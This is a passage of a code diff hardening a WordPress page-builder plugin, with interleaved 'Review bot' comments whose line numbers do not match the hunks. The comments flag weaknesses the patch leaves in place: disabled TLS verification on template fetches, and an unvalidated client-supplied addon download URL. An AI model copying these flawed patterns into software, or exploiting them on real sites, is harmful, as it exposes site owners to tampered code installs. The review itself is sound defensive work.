array(),
'1.9.3'
);
@@ -824,7 +824,7 @@
'delete_with_user' => false,
'template' => $blocktemplate,
'template_lock' => 'all',
- 'label' => __( 'GreenShift Stylebook', 'greenshift-animation-and-page-builder-blocks' ),
+ 'label' => esc_html__( 'GreenShift Stylebook', 'greenshift-animation-and-page-builder-blocks' ),
);
register_post_type( 'gspbstylebook', $args );
@@ -947,7 +947,7 @@
if(!$source){return '';}
$p = new WP_HTML_Tag_Processor( $html );
if ( $p->next_tag( 'spline-viewer' )) {
- $p->set_attribute( 'url', $source);
+ $p->set_attribute( 'url', esc_url($source));
}
$html = $p->get_updated_html();
}
@@ -980,7 +980,7 @@
if(empty($end)){return '';}
$p = new WP_HTML_Tag_Processor( $html );
if ( $p->next_tag( array( 'class_name' => 'gs-counter' ) ) ) {
- $p->set_attribute( 'data-end', $end);
+ $p->set_attribute( 'data-end', esc_attr($end));
}
$html = $p->get_updated_html();
}
@@ -1206,7 +1206,7 @@
if($endtime){
$p = new WP_HTML_Tag_Processor( $html );
if ( $p->next_tag( array( 'class_name' => 'gs-countdown' ) ) ) {
- $p->set_attribute( 'data-endtime', $endtime);
+ $p->set_attribute( 'data-endtime', esc_attr($endtime));
}
$html = $p->get_updated_html();
@@ -1242,7 +1242,7 @@
$p = new WP_HTML_Tag_Processor( $html );
if ( $p->next_tag( array( 'class_name' => 'gs-countdown' ) ) ) {
- $p->set_attribute( 'data-endtime', $formattedDateTime);
+ $p->set_attribute( 'data-endtime', esc_attr($formattedDateTime));
}
$html = $p->get_updated_html();
}
@@ -1260,7 +1260,7 @@
}
$p = new WP_HTML_Tag_Processor( $html );
if ( $p->next_tag( array( 'class_name' => 'gs-countdown' ) ) ) {
- $p->set_attribute( 'data-endtime', $endtime);
+ $p->set_attribute( 'data-endtime', esc_attr($endtime));
}
$html = $p->get_updated_html();
}
@@ -1397,7 +1397,7 @@
if(!$td_url){return '';}
$p = new WP_HTML_Tag_Processor( $html );
if ( $p->next_tag( 'model-viewer' )) {
- $p->set_attribute( 'src', $td_url);
+ $p->set_attribute( 'src', esc_url($td_url));
}
$html = $p->get_updated_html();
}
@@ -1412,7 +1412,7 @@
}
$p = new WP_HTML_Tag_Processor( $html );
if ( $p->next_tag( 'model-viewer' )) {
- $p->set_attribute( 'ios-src', $usdz_url);
+ $p->set_attribute( 'ios-src', esc_url($usdz_url));
}
$html = $p->get_updated_html();
}
@@ -1443,13 +1443,13 @@
$replaced = GSPB_field_array_to_value($replaced, ', ');
if($replaced){
if ( $p->next_tag( array( 'class_name' => 'gs-video-element' ) ) ) {
- $p->set_attribute( 'data-src', $replaced);
+ $p->set_attribute( 'data-src', esc_url($replaced));
}
if ( $p->next_tag( array( 'class_name' => 'gs-video-element' ) ) ) {
- $p->set_attribute( 'data-src', $replaced);
+ $p->set_attribute( 'data-src', esc_url($replaced));
}
if($p->next_tag( array( 'tag_name' => 'meta') ) && $p->get_attribute( 'itemprop' ) == 'embedUrl' ) {
- $p->set_attribute( 'content', $replaced);
+ $p->set_attribute( 'content', esc_attr($replaced));
}
//Poster
if($block['attrs']['provider'] != 'video'){
@@ -1468,10 +1468,10 @@
$replaced = GSPB_make_dynamic_video($html, $block['attrs'], $block, $field, $src, true);
if($replaced){
if ( $p->next_tag( array( 'class_name' => 'gs-video-element' ) ) ) {
- $p->set_attribute( 'data-src', $replaced);
+ $p->set_attribute( 'data-src', esc_url($replaced));
}
if($p->next_tag( array( 'tag_name' => 'meta') ) && $p->get_attribute( 'itemprop' ) == 'embedUrl' ) {
- $p->set_attribute( 'content', $replaced);
+ $p->set_attribute( 'content', esc_attr($replaced));
}
//Poster
@@ -1722,9 +1722,10 @@
if(($type == 'preset' || $type == 'global') && !empty($class['value'])){
$css = greenshift_get_style_from_class_array($class['value'], $type, $inline = false);
if($css){
- $class_style = '<style>' . wp_kses_post($css) . '</style>';
+ $class_style = $css;
$class_style = gspb_get_final_css($class_style);
$class_style = htmlspecialchars_decode($class_style);
+ $class_style = '<style>' . wp_strip_all_tags($class_style) . '</style>';
$html = $html . $class_style;
}
}
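Review bot: The decode-then-strip order on L593–L594 is the right one (stripping before `htmlspecialchars_decode()` would let an encoded closing tag reappear), but `wp_strip_all_tags()` is a tag remover, not a CSS sanitizer: it deletes anything between `<` and `>`, so a legitimate `content: "<"` or `>` inside a quoted CSS string is mangled, and it does not validate the CSS itself. The same pattern is added in helper.php (1060, 1074) and at 1741 and 2304 of this file. If the goal is only to prevent breaking out of the `<style>` element, state that in a comment, e.g. `// strip tag-like sequences so generated CSS cannot close the <style> element; not a full CSS sanitizer`, so nobody treats this as authorisation to accept untrusted CSS. `greenshift_get_style_from_class_array()` is defined elsewhere, so where this CSS originates cannot be confirmed from the hunk.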
@@ -1741,11 +1742,12 @@
$dynamic_style = gspb_render_style_attributes($block['attrs']['styleAttributes'], '.'.$block['attrs']['localId'], '', isset($block['attrs']['enableSpecificity']) ? $block['attrs']['enableSpecificity'] : false);
}
}else{
- $dynamic_style = wp_kses_post($block['attrs']['inlineCssStyles']);
+ $dynamic_style = $block['attrs']['inlineCssStyles'];
}
$dynamic_style = gspb_get_final_css($dynamic_style);
$dynamic_style = gspb_quick_minify_css($dynamic_style);
$dynamic_style = htmlspecialchars_decode($dynamic_style);
+ $dynamic_style = wp_strip_all_tags($dynamic_style);
if (function_exists('GSPB_make_dynamic_image') && !empty($block['attrs']['background']['dynamicEnable'])) {
$dynamic_style = GSPB_make_dynamic_image($dynamic_style, $block['attrs'], $block, $block['attrs']['background'], $block['attrs']['background']['image']);
}
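Review bot: `wp_strip_all_tags()` on L608 runs before `GSPB_make_dynamic_image()` substitutes the background image value on L610, so whatever that helper inserts (presumably a URL from post meta or a dynamic field) is never covered by the strip and ends up inside the `<style>` element unsanitized. Unless `GSPB_make_dynamic_image()` escapes its own output (it is defined elsewhere, so I cannot confirm), move the strip after the substitution or apply it again to `$dynamic_style` once the helper has run. `$block['attrs']['inlineCssStyles']` on L603 now also reaches the minifier without the former `wp_kses_post()` pass, which is fine given L608 but deserves a comment noting that the strip below is what replaced it.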
@@ -2292,11 +2294,9 @@
// Add global JavaScript variables for separated animation classes
if (!empty($clip_classes) || !empty($animation_classes)) {
- $js_variables = '<script>';
- $js_variables .= 'window.clipClasses = ' . json_encode($clip_classes) . ';';
- $js_variables .= 'window.animationClasses = ' . json_encode($animation_classes) . ';';
- $js_variables .= '</script>';
- echo $js_variables;
+ $js_code = 'window.clipClasses = ' . wp_json_encode($clip_classes) . ';';
+ $js_code .= 'window.animationClasses = ' . wp_json_encode($animation_classes) . ';';
+ wp_print_inline_script_tag($js_code);
}
}
@@ -2304,6 +2304,7 @@
$gs_global_css = gspb_get_final_css($gs_global_css);
$gs_global_css = gspb_quick_minify_css($gs_global_css);
$gs_global_css = htmlspecialchars_decode($gs_global_css);
+ $gs_global_css = wp_strip_all_tags($gs_global_css);
wp_register_style('greenshift-global-css', false);
wp_enqueue_style('greenshift-global-css');
wp_add_inline_style('greenshift-global-css', $gs_global_css);
@@ -2315,7 +2316,7 @@
foreach ($options['global_interactions'] as $index => $value) {
if(!empty($value)){
$has_value = true;
- $script .= 'GSPB_Trigger_Actions("front", document.querySelectorAll(".'.esc_attr($index).'"), window, document, null, ''.json_encode($value).'');';
+ $script .= 'GSPB_Trigger_Actions("front", document.querySelectorAll(".'.esc_attr($index).'"), window, document, null, ''.wp_json_encode($value).'');';
}
}
if($has_value){
@@ -2437,7 +2438,7 @@
body:has(.gspb_inspector_btn--darkmode--active) .editor-styles-wrapper{';
foreach ($options['darkmodecolors'] as $key=>$element) {
if (!empty($element)) {
- $nightcolor_css .= $key . ':' . $element . ';';
+ $nightcolor_css .= esc_attr($key) . ':' . esc_attr($element) . ';';
}
}
$nightcolor_css .= '}';
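Review bot: `esc_attr()` on L647 is an HTML-attribute escaper applied to text being assembled into a CSS rule (`... .editor-styles-wrapper{ key:value; }`), so a value containing `"` or `>` is emitted as `&quot;`/`&gt;`, which CSS does not decode, rather than being rejected. For a colour map the right guard is validation of the value shape, e.g. `sanitize_hex_color($element)` where hex is expected, or a conservative pattern such as `if (!preg_match('/^[a-zA-Z0-9#(),.%\s-]+$/', $element)) { continue; }`, plus a key check like `preg_match('/^--[a-zA-Z0-9_-]+$/', $key)` if these are CSS custom properties (inferred from the `key:value` shape; please confirm). Where `$nightcolor_css` ends up (inline `<style>` vs. `wp_add_inline_style()`) is outside the hunk, so the exact treatment needed should be confirmed against that sink.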
@@ -2492,7 +2493,7 @@
foreach ($options['global_interactions'] as $index => $value) {
if(!empty($value)){
$has_value = true;
- $script .= 'GSPB_Trigger_Actions("front", document.querySelectorAll(".'.esc_attr($index).'"), window, document, null, ''.json_encode($value).'');';
+ $script .= 'GSPB_Trigger_Actions("front", document.querySelectorAll(".'.esc_attr($index).'"), window, document, null, ''.wp_json_encode($value).'');';
}
}
if($has_value){
@@ -3604,43 +3605,8 @@
return new WP_Error('no_file', 'No file was uploaded', array('status' => 400));
}
- // Get WordPress upload directory
- $upload_dir = wp_upload_dir();
- $custom_dir = $upload_dir['basedir'] . '/api_upload';
-
- // Create custom upload directory if it doesn't exist
- if (!file_exists($custom_dir)) {
- wp_mkdir_p($custom_dir);
-
- // Create .htaccess to prevent directory listing but allow file access
- $htaccess_content = "Options -Indexesn";
- file_put_contents($custom_dir . '/.htaccess', $htaccess_content);
- }
-
// Get file details
$file = $_FILES['file'];
- $filename = sanitize_file_name($file['name']);
- $tmp_name = $file['tmp_name'];
-
- // Enhanced security checks
- $allowed_types = array(
- 'image/jpeg',
- 'image/jpg',
- 'image/png',
- 'image/gif',
- 'image/webp',
- 'image/heic',
- 'image/heif',
- 'application/pdf',
- 'application/text',
- );
-
- // Verify file type using WordPress function
- $filetype = wp_check_filetype($filename);
- $mime_type = !empty($filetype['ext']) ? $filetype['ext'] : '';
- if (!$mime_type || !in_array($filetype['type'], $allowed_types)) {
- return new WP_Error('invalid_file_type', 'File type not allowed', array('status' => 400));
- }
// Check file size (limit to 10MB)
$max_size = 10 * 1024 * 1024;
@@ -3648,132 +3614,96 @@
return new WP_Error('file_too_large', 'File size exceeds limit of 10MB', array('status' => 400));
}
- // Generate unique filename with timestamp
- $file_ext = pathinfo($filename, PATHINFO_EXTENSION);
- $new_filename = sprintf(
- '%s_%s.%s',
- uniqid(),
- time(),
- $file_ext
+ // Include required WordPress files for media handling
+ require_once(ABSPATH . 'wp-admin/includes/file.php');
+ require_once(ABSPATH . 'wp-admin/includes/image.php');
+ require_once(ABSPATH . 'wp-admin/includes/media.php');
+
+ // Define allowed mime types
+ $allowed_types = array(
+ 'jpg|jpeg|jpe' => 'image/jpeg',
+ 'png' => 'image/png',
+ 'gif' => 'image/gif',
+ 'webp' => 'image/webp',
+ 'heic' => 'image/heic',
+ 'heif' => 'image/heif',
+ 'pdf' => 'application/pdf',
+ 'txt' => 'text/plain',
);
- $destination = $custom_dir . '/' . $new_filename;
- // Move file to destination
- if (!move_uploaded_file($tmp_name, $destination)) {
- // Clean up on failure
- if (file_exists($tmp_name)) {
- unlink($tmp_name);
- }
- return new WP_Error('upload_failed', 'Failed to upload file', array('status' => 500));
+ // Use WordPress's built-in upload handler
+ $upload_overrides = array(
+ 'test_form' => false,
+ 'mimes' => $allowed_types,
+ );
+
+ $uploaded_file = wp_handle_upload($file, $upload_overrides);
+
+ if (isset($uploaded_file['error'])) {
+ return new WP_Error('upload_failed', $uploaded_file['error'], array('status' => 500));
}
- // Add file to WordPress media library
+ // Prepare attachment data
+ $filename = sanitize_file_name($file['name']);
$attachment = array(
- 'post_mime_type' => $mime_type,
- 'post_title' => sanitize_file_name($filename),
- 'post_content' => '',
- 'post_status' => 'inherit'
+ 'post_mime_type' => $uploaded_file['type'],
+ 'post_title' => sanitize_file_name(pathinfo($filename, PATHINFO_FILENAME)),
+ 'post_content' => '',
+ 'post_status' => 'inherit'
);
- $attach_id = wp_insert_attachment($attachment, $destination);
+ // Insert attachment into WordPress media library
+ $attach_id = wp_insert_attachment($attachment, $uploaded_file['file']);
if (is_wp_error($attach_id)) {
// Clean up on failure
- unlink($destination);
+ wp_delete_file($uploaded_file['file']);
return $attach_id;
}
- // Generate metadata for the attachment
- require_once(ABSPATH . 'wp-admin/includes/image.php');
- $attach_data = wp_generate_attachment_metadata($attach_id, $destination);
+ // Generate attachment metadata
+ $attach_data = wp_generate_attachment_metadata($attach_id, $uploaded_file['file']);
wp_update_attachment_metadata($attach_id, $attach_data);
// Return success response with file details
return array(
- 'success' => true,
- 'file_url' => wp_get_attachment_url($attach_id),
- 'file_path' => $destination,
+ 'success' => true,
+ 'file_url' => $uploaded_file['url'],
+ 'file_path' => $uploaded_file['file'],
'attachment_id' => $attach_id,
- 'mime_type' => $mime_type,
- 'file_size' => $file['size']
+ 'mime_type' => $uploaded_file['type'],
+ 'file_size' => $file['size']
);
} else {
return new WP_Error('invalid_type', 'Invalid API type specified', array('status' => 400));
}
- // Check if streaming is enabled
- $is_streaming = isset($body['stream']) && $body['stream'] === true;
-
- if ($is_streaming) {
- // Set proper headers for streaming
- header('Content-Type: text/event-stream');
- header('Cache-Control: no-cache');
- header('Connection: keep-alive');
- header('X-Accel-Buffering: no'); // Important for Nginx
-
- // Ensure output buffering is handled properly
- if (ob_get_level() > 0) {
- ob_end_flush();
- }
-
- // Initialize cURL
- $ch = curl_init($endpoint);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_HTTPHEADER, [
- 'Authorization: Bearer ' . $api_key,
- 'Content-Type: application/json'
- ]);
- curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($body));
- curl_setopt($ch, CURLOPT_WRITEFUNCTION, function($ch, $data) {
- // Process each chunk of data
- echo $data; // Simply forward the data as-is
-
- // Force flush after each chunk
- if (ob_get_level() > 0) {
- ob_flush();
- }
- flush();
-
- return strlen($data);
- });
-
- $response = curl_exec($ch);
-
- if (curl_errno($ch)) {
- echo "data: " . json_encode(['error' => curl_error($ch)]) . "nn";
- flush();
- }
-
- curl_close($ch);
- exit;
- } else {
- // Standard non-streaming request
- $response = wp_safe_remote_post($endpoint, array(
- 'headers' => $headers,
- 'body' => json_encode($body),
- 'timeout' => 120
- ));
-
- if (is_wp_error($response)) {
- return $response;
- }
-
- $response_code = wp_remote_retrieve_response_code($response);
- $response_body = wp_remote_retrieve_body($response);
-
- if ($response_code !== 200) {
- return new WP_Error(
- 'api_error',
- 'Error from OpenAI API: ' . $response_body,
- array('status' => $response_code)
- );
- }
-
- $result = json_decode($response_body, true);
+ // Standard non-streaming request
+ $response = wp_safe_remote_post($endpoint, array(
+ 'headers' => $headers,
+ 'body' => json_encode($body),
+ 'timeout' => 120
+ ));
+
+ if (is_wp_error($response)) {
+ return $response;
}
+ $response_code = wp_remote_retrieve_response_code($response);
+ $response_body = wp_remote_retrieve_body($response);
+
+ if ($response_code !== 200) {
+ return new WP_Error(
+ 'api_error',
+ 'Error from OpenAI API: ' . $response_body,
+ array('status' => $response_code)
+ );
+ }
+
+ $result = json_decode($response_body, true);
return $result;
}
+
//////////////////////////////////////////////////////////////////
// USDZ support until WP will have it
//////////////////////////////////////////////////////////////////
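Review bot: The non-streaming path returns `json_decode($response_body, true)` unchecked at the end of the hunk, so a 200 response with a non-JSON body is returned as `null` with no error, which is inconsistent with the `json_last_error()` check this same commit adds to gspb_get_categories. Add `if (json_last_error() !== JSON_ERROR_NONE) { return new WP_Error('api_error', 'Invalid JSON from API', array('status' => 502)); }` before `return $result;`. Two smaller points in the upload branch: the success array exposes the absolute server path in `file_path`, which a client rarely needs and which reveals filesystem layout, and `'Error from OpenAI API: ' . $response_body` forwards the upstream error body verbatim to the caller. The enclosing function starts before this hunk.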
@@ -3805,6 +3735,11 @@
if (!function_exists('gspb_get_all_layouts')) {
function gspb_get_all_layouts()
{
+ if (!current_user_can('edit_posts')) {
+ wp_send_json_error('Insufficient permissions', 403);
+ }
+ check_ajax_referer('gspb_nonce', 'security');
+
$get_args = array('timeout' => 200, 'sslverify' => false);
$category = intval($_POST['category_id']);
$page = !empty($_POST['page']) ? intval($_POST['page']) : 1;
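Review bot: `'sslverify' => false` on the `$get_args` line disables TLS certificate verification for the request to the template server, so the layouts and CSS this handler fetches and stores can be substituted by anyone on the network path; the same option is set in gspb_get_categories in the hunk at -4052/+3987. The remote host is the vendor's own (TEMPLATE_SERVER_URL), so default verification should work and the option can be dropped: `$get_args = array('timeout' => 200);`. Also, `intval($_POST['category_id'])` on the next line reads the key with no isset guard while the rewritten gspb_get_categories does guard it; `$category = isset($_POST['category_id']) ? intval($_POST['category_id']) : 0;` keeps the two consistent. gspb_get_all_layouts continues past the hunk.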
@@ -3847,7 +3782,7 @@
}
function gspb_isIncludedDomain($url, $included_domains) {
- $parsed_url = parse_url($url);
+ $parsed_url = wp_parse_url($url);
if (!isset($parsed_url['host'])) {
return false; // Not a valid URL
}
@@ -3876,9 +3811,9 @@
$public_assets_url = '';
if(!empty($_POST['download_url']) || !empty($_POST['download_url_animated'])){
if(!empty($_POST['download_animated']) && $_POST['download_animated'] == 'yes' && !empty($_POST['download_url_animated'])){
- $apiUrl = esc_url($_POST['download_url_animated']);
+ $apiUrl = esc_url(sanitize_text_field(wp_unslash($_POST['download_url_animated'])));
}else{
- $apiUrl = esc_url($_POST['download_url']);
+ $apiUrl = esc_url(sanitize_text_field(wp_unslash($_POST['download_url'])));
}
$included_domains = ["wpsoul.net", "greenshiftwp.com", "wpsoul.com"];
if (gspb_isIncludedDomain($apiUrl, $included_domains)) {
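Review bot: esc_url() is an output escaper — it entity-encodes `&` to `&#038;` — but `$apiUrl` is a request target here (it is checked against the domain allowlist two lines later and, presumably, fetched), so a download URL with more than one query parameter reaches the template server with a mangled query string. Use the raw variant and let the allowlist do the filtering: `$apiUrl = esc_url_raw(wp_unslash($_POST['download_url_animated']));` and the same for `download_url`. Since the value comes from the client, it would also be worth having gspb_isIncludedDomain() accept only the https scheme.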
@@ -4035,14 +3970,14 @@
$responsecss = wp_safe_remote_get($cssUrl, $get_args);
$request_resultcss = wp_remote_retrieve_body($responsecss);
if ($request_resultcss) {
- $layout_styles = strip_tags($request_resultcss);
+ $layout_styles = wp_strip_all_tags($request_resultcss);
$layout_styles = trim($layout_styles, '"');
update_post_meta($pageid, '_gspb_post_css', $layout_styles);
}
}
- echo $request_result;
+ echo wp_kses_post($request_result);
}else{
- echo $request_result;
+ echo wp_kses_post($request_result);
}
}
wp_die();
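Review bot: Wrapping the remote body in wp_kses_post() at the two echo lines changes what the editor receives in a way that depends on the response's content type, which is not visible in the hunk: if `$request_result` is JSON, kses entity normalisation can alter string values, and if it is block markup, kses strips `<script>`, `<style>`, SVG and many attributes that imported layouts rely on. If the body is JSON, decode it and respond with `wp_send_json($data)` as this commit already does in gspb_get_categories; if it is HTML, state that in a comment at the echo and choose the escaper for that context deliberately. The enclosing function starts before this hunk.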
@@ -4052,25 +3987,44 @@
if (!function_exists('gspb_get_categories')) {
function gspb_get_categories()
{
+ if (!current_user_can('edit_posts')) {
+ wp_send_json_error('Insufficient permissions', 403);
+ }
+ check_ajax_referer('gspb_nonce', 'security');
+
$get_args = array(
'timeout' => 200,
'sslverify' => false,
);
- $id = intval($_POST['category_id']);
+ $id = isset($_POST['category_id']) ? intval($_POST['category_id']) : 0;
$apiUrl = TEMPLATE_SERVER_URL . '/wp-json/wp/v2/categories?parent=' . $id;
$response = wp_safe_remote_get($apiUrl, $get_args);
+
+ if (is_wp_error($response)) {
+ wp_send_json_error('Failed to fetch categories', 500);
+ }
+
$request_result = wp_remote_retrieve_body($response);
- if ($request_result == '') {
- return false;
- } else {
- echo wp_remote_retrieve_body($response);
+ if ($request_result === '') {
+ wp_send_json_error('Empty response', 404);
}
- wp_die();
+
+ $data = json_decode($request_result, true);
+ if (json_last_error() !== JSON_ERROR_NONE) {
+ wp_send_json_error('Invalid JSON response', 500);
+ }
+
+ wp_send_json($data);
}
}
function gspb_get_saved_block()
{
+ if (!current_user_can('edit_posts')) {
+ wp_send_json_error('Insufficient permissions', 403);
+ }
+ check_ajax_referer('gspb_nonce', 'security');
+
$args = array(
'post_type' => 'wp_block',
'post_status' => 'publish',
@@ -4086,7 +4040,7 @@
$wp_blocks = $get_posts->query($r);
$response = array(
'blocks' => $wp_blocks,
- 'admin' => admin_url()
+ 'admin' => esc_url(admin_url())
);
wp_send_json_success($response);
}
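Review bot: esc_url() on `admin_url()` applies HTML-attribute encoding (`&` becomes `&#038;`) to a value that is sent as JSON for JavaScript to consume, not printed into HTML; esc_url_raw() is the variant for non-HTML contexts: `'admin' => esc_url_raw(admin_url())`. The difference is invisible today because admin_url() carries no query string, but the escaper should match the context. gspb_get_saved_block starts before this hunk.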
@@ -4132,13 +4086,25 @@
}
// Verify nonce
- if (!wp_verify_nonce($_POST['nonce'], 'gspb_install_addon_nonce')) {
+ if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'gspb_install_addon_nonce')) {
wp_die(json_encode(array('success' => false, 'message' => 'Security check failed')));
}
$addon_slug = sanitize_text_field($_POST['addon_slug']);
$download_url = esc_url_raw($_POST['download_url']);
+ $allowed_addons = array(
+ 'greenshiftchart',
+ 'greenshiftgsap',
+ 'greenshiftwoo',
+ 'greenshiftseo',
+ 'greenshiftquery',
+ );
+
+ if (!in_array($addon_slug, $allowed_addons, true)) {
+ wp_die(json_encode(array('success' => false, 'message' => 'Not allowed to install this addon')));
+ }
+
// Check if plugin folder already exists
$plugin_dir = WP_PLUGIN_DIR . '/' . $addon_slug;
if (is_dir($plugin_dir)) {
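Review bot: The new slug allowlist constrains where the addon is written but not where it comes from: `$download_url` just above it is still whatever the client posted, so the handler will fetch and install an arbitrary zip under one of the allowed folder names (the download itself happens after this hunk, so this is inferred). Either derive the URL from the slug server-side, or validate it with the file's existing `gspb_isIncludedDomain($download_url, $included_domains)` and require an https scheme. Separately, `$_POST['nonce']` is dereferenced without an isset guard in the verify line here and in the hunk at -4212/+4178; `isset($_POST['nonce']) ? sanitize_text_field(wp_unslash($_POST['nonce'])) : ''` avoids the warning on a missing key.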
@@ -4184,7 +4150,7 @@
// Clean up temp file
if (file_exists($temp_file)) {
- unlink($temp_file);
+ wp_delete_file($temp_file);
}
if (is_wp_error($result)) {
@@ -4212,7 +4178,7 @@
}
// Verify nonce
- if (!wp_verify_nonce($_POST['nonce'], 'gspb_activate_addon_nonce')) {
+ if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'gspb_activate_addon_nonce')) {
wp_die(json_encode(array('success' => false, 'message' => 'Security check failed')));
}
--- a/greenshift-animation-and-page-builder-blocks/page-templates/canvas-scroll.php
+++ b/greenshift-animation-and-page-builder-blocks/page-templates/canvas-scroll.php
@@ -18,7 +18,7 @@
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="profile" href="https://gmpg.org/xfn/11" />
<?php if (!current_theme_supports('title-tag')) : ?>
- <title><?php echo wp_get_document_title(); ?></title>
+ <title><?php echo esc_html(wp_get_document_title()); ?></title>
<?php endif; ?>
<?php wp_head(); ?>
</head>
@@ -36,7 +36,7 @@
<?php wp_body_open(); ?>
<?php while (have_posts()) : the_post(); ?>
<div class="entry-content wp-block-post-content">
- <?php echo ''.$the_content.''; ?>
+ <?php echo $the_content; ?>
</div>
<?php endwhile; ?>
<?php wp_footer(); ?>
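Review bot: `echo $the_content;` outputs the variable unescaped, and the line that builds `$the_content` is outside the hunk, so a reader cannot tell whether it is already filtered output (the usual `apply_filters('the_content', ...)` contract) or raw post content. If it is filtered content, record that at the echo so the missing escaper reads as deliberate, e.g. `<?php echo $the_content; /* output of the_content filters; intentionally not escaped */ ?>`.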
--- a/greenshift-animation-and-page-builder-blocks/page-templates/canvas.php
+++ b/greenshift-animation-and-page-builder-blocks/page-templates/canvas.php
@@ -17,7 +17,7 @@
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="profile" href="https://gmpg.org/xfn/11" />
<?php if ( ! current_theme_supports( 'title-tag' ) ) : ?>
- <title><?php echo wp_get_document_title(); ?></title>
+ <title><?php echo esc_html(wp_get_document_title()); ?></title>
<?php endif; ?>
<?php wp_head(); ?>
</head>
--- a/greenshift-animation-and-page-builder-blocks/page-templates/full-width.php
+++ b/greenshift-animation-and-page-builder-blocks/page-templates/full-width.php
@@ -19,7 +19,7 @@
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="profile" href="https://gmpg.org/xfn/11" />
<?php if ( ! current_theme_supports( 'title-tag' ) ) : ?>
- <title><?php echo wp_get_document_title(); ?></title>
+ <title><?php echo esc_html(wp_get_document_title()); ?></title>
<?php endif; ?>
<?php wp_head(); ?>
</head>
--- a/greenshift-animation-and-page-builder-blocks/plugin.php
+++ b/greenshift-animation-and-page-builder-blocks/plugin.php
@@ -6,7 +6,7 @@
* Author: Wpsoul
* Author URI: https://greenshiftwp.com
* Plugin URI: https://greenshiftwp.com
- * Version: 12.6
+ * Version: 12.6.1
* Text Domain: greenshift-animation-and-page-builder-blocks
* License: GPL2+
* License URI: https://www.gnu.org/licenses/gpl-2.0.txt
@@ -176,7 +176,6 @@
require_once GREENSHIFT_DIR_PATH . 'init.php';
require_once GREENSHIFT_DIR_PATH . 'includes/helper.php';
require_once GREENSHIFT_DIR_PATH . 'settings.php';
-//require_once GREENSHIFT_DIR_PATH . 'includes/patterns.php';
require_once GREENSHIFT_DIR_PATH . 'includes/jsoptimization.php';
require_once GREENSHIFT_DIR_PATH . 'includes/importer.php';
@@ -184,7 +183,6 @@
add_action('plugins_loaded', 'gspb_GreenShift_plugin_init');
function gspb_GreenShift_plugin_init()
{
- load_plugin_textdomain('greenshift-animation-and-page-builder-blocks', false, GREENSHIFT_DIR_PATH . 'lang'); //translation files
if (class_exists('EddLicensePage')) {
new EddLicensePage();
}
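Review bot: Dropping the load_plugin_textdomain() call means the plugin's bundled `lang` directory is no longer a translation source; translations are then picked up only from the language packs WordPress loads automatically. If .mo files are still shipped in `lang`, this is a behaviour change that deserves a changelog line; if the bundled files are being retired, a one-line comment where the call was (`// translations are loaded from language packs; no bundled lang/ directory`) stops the next maintainer from re-adding it.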
@@ -201,9 +199,11 @@
return;
}
if(defined('GREENSHIFT_THEME_VERSION')){
- exit(wp_redirect(admin_url('admin.php?page=greenshift_theme_settings')));
+ wp_redirect(esc_url(admin_url('admin.php?page=greenshift_theme_settings')));
+ exit;
}else{
- exit(wp_redirect(admin_url('admin.php?page=greenshift_dashboard')));
+ wp_redirect(esc_url(admin_url('admin.php?page=greenshift_dashboard')));
+ exit;
}
}
}
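Review bot: esc_url() is the wrong helper for a redirect target: it is an HTML output escaper (it entity-encodes `&`), and the URL here never reaches HTML. For local admin redirects the idiomatic form is `wp_safe_redirect(admin_url('admin.php?page=greenshift_theme_settings')); exit;` (and the same for the dashboard branch), which also enforces that the target stays on an allowed host. The separate `exit;` after each redirect is correct as written.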
--- a/greenshift-animation-and-page-builder-blocks/settings.php
+++ b/greenshift-animation-and-page-builder-blocks/settings.php
@@ -418,12 +418,12 @@
});
</script>
<div class="stylebook_form_wrap" style="padding:25px">
- <h1><?php _e('GreenShift Stylebook', 'greenshift-animation-and-page-builder-blocks'); ?></h1>
+ <h1><?php esc_html_e('GreenShift Stylebook', 'greenshift-animation-and-page-builder-blocks'); ?></h1>
<div id="ajax-response"> </div>
<form id="stylebook_generation" method="post" class="stylbook_btn_wrapper">
<?php wp_nonce_field('gspb_generate_stylebook', 'gspb_stylebook'); ?>
<div class="stylbook_btn_wrapper">
- <input type="submit" id="greenshift_stylebook_btn" name="greenshift_stylebook_btn" value=<?php _e('Create Stylebook', 'greenshift-animation-and-page-builder-blocks'); ?> class="button button-primary button-large">
+ <input type="submit" id="greenshift_stylebook_btn" name="greenshift_stylebook_btn" value="<?php esc_html_e('Create Stylebook', 'greenshift-animation-and-page-builder-blocks'); ?>" class="button button-primary button-large">
<span class="spinner"></span>
</div>
</form>
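Review bot: `esc_html_e()` is used inside a `value="..."` attribute on the submit input; the attribute context calls for `esc_attr_e('Create Stylebook', 'greenshift-animation-and-page-builder-blocks')`. Both escapers encode quotes, so the difference rarely shows, but the escaper should name the context it protects. The same pattern is in the `Save settings` inputs in the hunks at -617, -763, -924 and -1153.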
@@ -617,7 +617,7 @@
</tr>
</table>
- <input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings"); ?>" class="button button-primary button-large">
+ <input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings", 'greenshift-animation-and-page-builder-blocks'); ?>" class="button button-primary button-large">
</div>
</form>
@@ -699,7 +699,7 @@
</svg></div>
<div class="gs-box-text">
<?php esc_html_e("Install Smart Code AI free plugin to enable code editor in block HTML/CSS panels", 'greenshift-animation-and-page-builder-blocks'); ?>
- <a target="_blank" href="<?php echo admin_url('plugin-install.php?s=Greenshift%2520Smart%2520Code%2520AI&tab=search&type=term');?>" target="_blank"><?php esc_html_e("Download", 'greenshift-animation-and-page-builder-blocks'); ?></a>
+ <a target="_blank" href="<?php echo esc_url(admin_url('plugin-install.php?s=Greenshift%2520Smart%2520Code%2520AI&tab=search&type=term'));?>" target="_blank"><?php esc_html_e("Download", 'greenshift-animation-and-page-builder-blocks'); ?></a>
</div>
</div>
</div>
@@ -763,7 +763,7 @@
</tr>
</table>
- <input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings"); ?>" class="button button-primary button-large">
+ <input type="submit" name="gspb_save_settings" value="<?php esc_html_e("Save settings", "greenshift-animation-and-page-builder-blocks"); ?>" class="button button-primary button-large">
</div>
</form>
@@ -834,7 +834,7 @@
<td>
<input name="row" type="text" value="<?php if (isset($global_settings['breakpoints']['row'])) {
echo esc_attr($global_settings['breakpoints']['row']);
